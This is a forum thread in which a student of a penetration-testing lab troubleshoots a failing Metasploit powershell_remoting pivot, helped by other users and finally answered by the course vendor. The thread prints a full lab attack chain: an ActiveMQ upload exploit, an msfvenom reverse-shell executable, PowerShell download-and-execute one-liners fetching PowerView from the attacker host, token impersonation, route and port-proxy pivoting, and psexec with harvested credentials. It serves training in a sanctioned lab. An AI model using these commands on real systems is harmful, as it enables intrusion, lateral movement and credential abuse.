PTP LAB 20 powershell_remoting issue

In Lab 20 PowerShell for Post-exploitation and Lateral Movement I get Exploit failed: Rex::RuntimeError Powershell command length is greater than the command line maximum (8192 characters) when using the powershell_remoting module. Also, the markdown around this part of the lab is broken but this is mostly superficial so I can deal with that… Has anyone had the same issue or came across a solution??? The furthest I’ve gotten is with trying: set Powershell::prepend_protections_bypass false and set Powershell::encode_final_payload true to no longer see the error and get sending stager… but still no working meterpreter.

first, try to supply the commands you use in order to help appropriately

…The commands used are the exact same as those specified in the lab answers (up until the noted changes I made above to try get around the 8192 character error.) I also tried different payloads, migrating processes and getting System through an alternative method but powershell_remoting still gives me this problem regardless.

please provide the commands here.

Okay; from the point I got NT AUTHORITY\SYSTEM I had setup a route with: run autoroute -s 10.100.11.0/24 and ran a post arp_scanner to find a target to use discovered AD credentials on. I then did use post/windows/manage/portproxy and set connect_address, local_address, connect_port, local_port, and session with their respective values. Once the port proxy was configured, I used found AD credentials with use exploit/windows/local/powershell_remoting. I then set session, set smbuser, set smbpass, set smbdomain, set rhosts, set payload, set lhost, set lport, exploit -j. Note that the lhost is my first victim address I have system on (with the same subnet as the new rhost) and NOT my usual attacker LHOST. The ports all match the port proxy port and it shows binded okay, unless I’ve tried once on that port already. At this point I get the Rex::RuntimeError 8192 character error. unless I do (not in the lab:) set Powershell::prepend_protections_bypass false and set Powershell::encode_final_payload true at which point the error is gone and I see sending stager to (blank) and it completes with no session.

please format code with the help of ``` or single backticks

The length is limited - you can not do anything against that. If you put less code (e.g. by leaving the amsi bypass code) it will work.

you will have to provide the actual route and set variables lhost, etc.

use post/windows/manage/portproxy
set CONNECT_ADDRESS 175.13.80.5
set LOCAL_ADDRESS 10.100.11.101
set CONNECT_PORT 4444
set LOCAL_PORT 4444
set session 1
run

use exploit/windows/local/powershell_remoting
set session 1
set SMBUSER [user]
set SMBPASS [password]
set SMBDOMAIN [domain]
set RHOSTS 10.100.11.100
set LHOST 10.100.11.101
set LPORT 4444
set payload windows/x64/meterpreter/reverse_tcp
exploit -j

1 Like

The above is when I get the error; there is no modifying the length in this module. I can get from something like:

[*] Started reverse TCP handler on 10.100.11.101:909 via the meterpreter on session 1
[-] Exploit failed: Rex::RuntimeError Powershell command length is greater than the command line maximum (8192 characters)

to

[] Started reverse TCP handler on 10.100.11.101:909 via the meterpreter on session 1
[
] Executing command…
[*] Completed

By doing:

set Powershell::prepend_protections_bypass false

But with

sessions -l

You can see no new session has opened successfully anyways. SOMETIMES it will also say

[*] Sending stage (200262 bytes) to

before it completes. It will then get in a cycle of

[-] Meterpreter session 3 is not valid and will be closed
[*] 172.17.80.100 - Meterpreter session 3 closed.

Yes, the set Powershell::prepend_protections_bypass false obviously modifies the length of the payload

would you try exploit/windows/smb/psexec instead of powershell_remoting?

edit: The 8192 byte limit occurs probably because the string is passed as an argument and the argument’s length is limited by the shell. Just assume a call like

invoke-expression(THEPAYLOAD)

Even though the point of the lab is pivoting to a secondary Win10 machine with powershell I tried psexec and got:

[] Started reverse TCP handler on 175.13.80.5:1234
[
] 10.100.11.100:445 - Connecting to the server…
[] 10.100.11.100:445 - Authenticating to 10.100.11.100:445|[domain] as user ‘[user]’…
[
] 10.100.11.100:445 - Executing the payload…
[+] 10.100.11.100:445 - Service start timed out, OK if running a command or non-service executable…
[*] Exploit completed, but no session was created.

ok, it looks like there is no connection to to other host, but I cant say anything else since you only show parts and not the whole command history you used.
obviously relevant would be the options, the payload, the portfwd, the routing table and such.

Nobody enforces the use of metasploit for psexec - you may do it via powershell; but it seems there is a problem even without the use of powershell; so that should be figured out before imho.

I mean…I feel like there must be some sort of connection because I can portscan it, psexec deems the credentials valid and verbose true shows the service being created but it times out starting it and gets removed on repeat. Bear with me and I will get the entirety of the commands I used, at least from one of my methods.

Edit - See below:
Scenario

For your second engagement, you have been tasked to conduct another external penetration test against an organization whose publicly-facing IP address range is 172.17.80.0/24

Your tester IP address is within the 175.13.80.0/24 range.

sudo ufw disable
sudo openvpn powershell-for-post-exploitation-and-lateral-movement.ovpn

ifconfig

tap0: 175.13.80.5 netmask 255.255.255.0 broadcast 0.0.0.0

nmap -sn 172.17.80.0/24
sudo nmap -sS -p- -v 172.17.80.100
nmap -sV -p 8161,49185,49155,5672,61616 -T4 -A -v 172.17.80.100

sudo msfconsole
use exploit/multi/http/apache_activemq_upload_jsp
set lhost 175.13.80.5
set rhosts 172.17.80.100
run

meterpreter > getuid
Server username: SYSTEM

msfvenom -p windows/meterpreter/reverse_tcp LHOST=175.13.80.5 LPORT=5555 -f exe > Malicious.exe
python -m SimpleHTTPServer 8000

upload Malicious.exe
shell

sudo msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 175.13.80.5
set lport 5555
run

Malicious.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

use incognito
list_tokens -u

ELS-CHILD\local_admin
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

impersonate_token ELS-CHILD\local_admin

shell
ipconfig

Ethernet adapter Local Area Connection 2:

IPv4 Address. . . . . . . . . . . : 172.17.80.100
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.17.80.1

Ethernet adapter Local Area Connection:

IPv4 Address. . . . . . . . . . . : 10.100.11.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.100.11.1

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://175.13.80.5:8000/PowerSploit-master/Recon/PowerView.ps1’); Get-NetDomainController”

orest : eLS.local
CurrentTime : 10/26/2021 5:37:15 PM
HighestCommittedUsn : 209038
OSVersion : Windows Server 2012 R2 Standard
Roles : {PdcRole, RidRole, InfrastructureRole}
Domain : els-child.eLS.local
IPAddress : 10.100.10.253
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://175.13.80.5:8000/PowerSploit-master/Recon/PowerView.ps1’); Find-LocalAdminAccess”

WIN10.els-child.eLS.local
child-dc01.els-child.eLS.local

ctrl+z
rev2self
run autoroute -s 10.100.11.0/24
route

Subnet           Netmask          Gateway        Metric  Interface
------           -------          -------        ------  ---------
0.0.0.0          0.0.0.0          10.100.11.1    266     11
0.0.0.0          0.0.0.0          172.17.80.1    266     13
10.100.11.0      255.255.255.0    10.100.11.101  266     11
10.100.11.101    255.255.255.255  10.100.11.101  266     11
10.100.11.255    255.255.255.255  10.100.11.101  266     11
127.0.0.0        255.0.0.0        127.0.0.1      306     1
127.0.0.1        255.255.255.255  127.0.0.1      306     1
127.255.255.255  255.255.255.255  127.0.0.1      306     1
172.17.80.0      255.255.255.0    172.17.80.100  266     13
172.17.80.100    255.255.255.255  172.17.80.100  266     13
172.17.80.255    255.255.255.255  172.17.80.100  266     13
224.0.0.0        240.0.0.0        127.0.0.1      306     1
224.0.0.0        240.0.0.0        10.100.11.101  266     11
224.0.0.0        240.0.0.0        172.17.80.100  266     13
255.255.255.255  255.255.255.255  127.0.0.1      306     1
255.255.255.255  255.255.255.255  10.100.11.101  266     11
255.255.255.255  255.255.255.255  172.17.80.100  266     13

ctrl+z
route

Subnet Netmask Gateway


10.100.11.0 255.255.255.0 Session 1

sessions -i 1

search -f *.txt
shell
type c:\UAT\uat_test_account.txt

Login with Active Directory credentials.

Username: ELS-CHILD\local_admin
Password: P@ssw0rd123

ctrl+z (x2)
use post/windows/gather/arp_scanner
set rhosts 10.100.11.0/24
set session 1
run

[+] IP: 10.100.11.1 MAC 00:50:56:a5:64:78 (VMware, Inc.)
[+] IP: 10.100.11.100 MAC 00:50:56:a5:2b:6f (VMware, Inc.) < NEW victim / 2nd RHOST to attack with newly found credentials
[+] IP: 10.100.11.101 MAC 00:50:56:a5:da:2c (VMware, Inc.) < CURRENT compromised RHOST
[+] IP: 10.100.11.255 MAC 00:50:56:a5:da:2c (VMware, Inc.)

use post/windows/manage/portproxy
set CONNECT_ADDRESS 175.13.80.5
set LOCAL_ADDRESS 10.100.11.101
set CONNECT_PORT 4444
set LOCAL_PORT 4444
set session 1
run

[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[] Setting PortProxy …
[+] PortProxy added.
[
] Port Forwarding Table

LOCAL IP LOCAL PORT REMOTE IP REMOTE PORT


10.100.11.101 4444 175.13.80.5 4444

use exploit/windows/local/powershell_remoting
set session 1
set SMBUSER local_admin
set SMBPASS P@ssw0rd123
set SMBDOMAIN ELS-CHILD
set RHOSTS 10.100.11.100
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.100.11.101
set LPORT 4444
exploit -j

exploit failed: Rex::RuntimeError Powershell command length is greater than the command line maximum (8192 characters)

use exploit/windows/smb/psexec
options
set rhosts 10.100.11.100
set SMBDOMAIN ELS-CHILD
set SMBPASS P@ssw0rd123
set SMBUSER local_admin
set lhost 175.13.80.5
set lport 1234
show targets
set target 1
set verbose true
run

[] Started reverse TCP handler on 175.13.80.5:1234
[
] 10.100.11.100:445 - Connecting to the server…
[] 10.100.11.100:445 - Authenticating to 10.100.11.100:445|ELS-CHILD as user ‘local_admin’…
[!] 10.100.11.100:445 - No active DB – Credential data will not be saved!
[
] 10.100.11.100:445 - Powershell command length: 4324
[] 10.100.11.100:445 - Executing the payload…
[
] 10.100.11.100:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.100.11.100[\svcctl] …
[] 10.100.11.100:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.100.11.100[\svcctl] …
[
] 10.100.11.100:445 - Obtaining a service manager handle…
[] 10.100.11.100:445 - Creating the service…
[+] 10.100.11.100:445 - Successfully created the service
[
] 10.100.11.100:445 - Starting the service…
[+] 10.100.11.100:445 - Service start timed out, OK if running a command or non-service executable…
[] 10.100.11.100:445 - Removing the service…
[+] 10.100.11.100:445 - Successfully removed the service
[
] 10.100.11.100:445 - Closing service handle…
[*] Exploit completed, but no session was created.

1 Like

This would only work if powershell-remoting was enabled on the target host (probably TCP/47001)

I dont know, wether you already had a look into the solution, but 10.100.11.100 is supposed to be exploited differently

btw. thanks for the comprehensive output :smiley: :+1:

10.100.11.101 (foothold) is exploited differently; I have also done the python ActiveMQExPV1.0.py method as per the answers… The issue for me is bouncing off of it to 10.100.11.100 (the second rhost to then pivot to DC (10.100.10.253) from a 10.100.10.0/24 subnet.) I have the same issue at powershell remoting regardless of how I got to SYSTEM on 10.100.11.101 at which point I am also following the lab answers and module configuration for 10.100.11.100 verbatim from what I can see.

Pasted below is how the lab says to exploit 10.100.11.100 - the second rhost :

msf post(windows/gather/arp_scanner) > use post/windows/manage/portproxy msf post(windows/manage/portproxy) > set CONNECT_ADDRESS 175.13.80.16 msf post(windows/manage/portproxy) > set CONNECT_PORT 4444 msf post(windows/manage/portproxy) > set LOCAL_ADDRESS 10.100.11.101 msf post(windows/manage/portproxy) > set LOCAL_PORT 4444 msf post(windows/manage/portproxy) > set SESSION 1 msf post(windows/manage/portproxy) > run

Now that our portproxy is configured, we can use the ELS-CHILD\local_admin" credentials to execute a powershell_remoting exploit against the newly identified system.

msf exploit(multi/script/web_delivery) > use exploit/windows/local/powershell_remoting msf exploit(windows/local/powershell_remoting) > set SESSION 1 msf exploit(windows/local/powershell_remoting) > set SMBUSER local_admin msf exploit(windows/local/powershell_remoting) > set SMBPASS P@ssw0rd123 msf exploit(windows/local/powershell_remoting) > set SMBDOMAIN ELS-CHILD msf exploit(windows/local/powershell_remoting) > set RHOSTS 10.100.11.100 msf exploit(windows/local/powershell_remoting) > set payload windows/x64/meterpreter/reverse_tcp msf exploit(windows/local/powershell_remoting) > set LHOST 10.100.11.101 msf exploit(windows/local/powershell_remoting) > set LPORT 4444 msf exploit(windows/local/powershell_remoting) > exploit -j

At this point, we should now have a meterpreter session back from the win 10 machine

  • And thank you for your replies

well, can you manually execute commands on the target?
$HOST=[System.Net.Dns]::GetHostbyAddress("10.100.11.100").HostName
something like that:

Invoke-Command -ComputerName $HOST -Credential ELS-CHILD\local_admin -ScriptBlock { Get-Culture }

or

$SESS = New-PSSession -ComputerName $HOST

I made sure I have System and a route again with run autoroute -s 10.100.11.0/24
nslookup on 10.100.11.100 (the remote machine I want to get to) gives Name: win10.els-child.els.local
From SYSTEM meterpreter (foothold @ 172.17.80.100/10.100.11.101) I’ve tried:

load powershell
powershell_shell
Enter-PSSession -ComputerName “win10.els-child.els.local” -Credential “ELS-CHILD\local_admin”

Kills my meterpreter. “Reason:Died”

So I re-get system, re-add a route, and drop into powershell

New-PSSession -ComputerName “win10.els-child.els.local”

Kills my meterpreter. “Reason:Died”

$global:s = New-PSSession -ComputerName “win10.els-child.els.local” -Credential “ELS-CHILD\local_admin”

Kills my meterpreter. “Reason:Died”

$HOST=[System.Net.Dns]::GetHostbyAddress(“10.100.11.100”).HostName

ERROR: Cannot overwrite variable Host because it is read-only or constant.
ERROR: At line:1 char:6
ERROR: + $HOST <<<< =[System.Net.Dns]::GetHostbyAddress(“10.100.11.100”).HostName
ERROR: + CategoryInfo : WriteError: (Host:String) , SessionStateUnauthorizedAccessException
ERROR: + FullyQualifiedErrorId : VariableNotWritable
ERROR:

Invoke-Command -ComputerName “win10.els-child.els.local” -ScriptBlock {Get-UICulture}

Kills my meterpreter. “Reason:Died”

Test-WsMan “win10.els-child.els.local”

wsmid : http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd
ProtocolVersion : http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd
ProductVendor : Microsoft Corporation
ProductVersion : OS: 0.0.0 SP: 0.0 Stack: 3.0

***THIS ONLY WORKED ONCE - the rest of the time I get:

ERROR: Test-WSMan : The WinRM client cannot complete the operation within the time specified. Check if the machine name is val
ERROR: id and is reachable over the network and firewall exception for Windows Remote Management service is enabled.
ERROR: At line:1 char:11
ERROR: + Test-WsMan <<<< “win10.els-child.els.local”
ERROR: + CategoryInfo : InvalidOperation: (win10.els-child.els.local:String) [Test-WSMan], InvalidOperationExcep
ERROR: tion
ERROR: + FullyQualifiedErrorId : WsManError,Microsoft.WSMan.Management.TestWSManCommand

Eventually it also killed my meterpreter after multiple tries.

Connect-WSMan -ComputerName “win10.els-child.els.local”

ERROR: Connect-WSMan : Access is denied.
ERROR: At line:1 char:14
ERROR: + Connect-WSMan <<<< -ComputerName “win10.els-child.els.local”
ERROR: + CategoryInfo : InvalidOperation: (win10.els-child.els.local:String) [Connect-WSMan], InvalidOperationEx
ERROR: ception
ERROR: + FullyQualifiedErrorId : WsManError,Microsoft.WSMan.Management.ConnectWSManCommand
ERROR:

Or it will kill my Meterpreter.

Finally got a sanity check from INE via email: “…apparently the lab was built using Python2 and that has since depreciated…I cannot provide any sort of ETA at this time when it will be fixed but it should be soon”

1 Like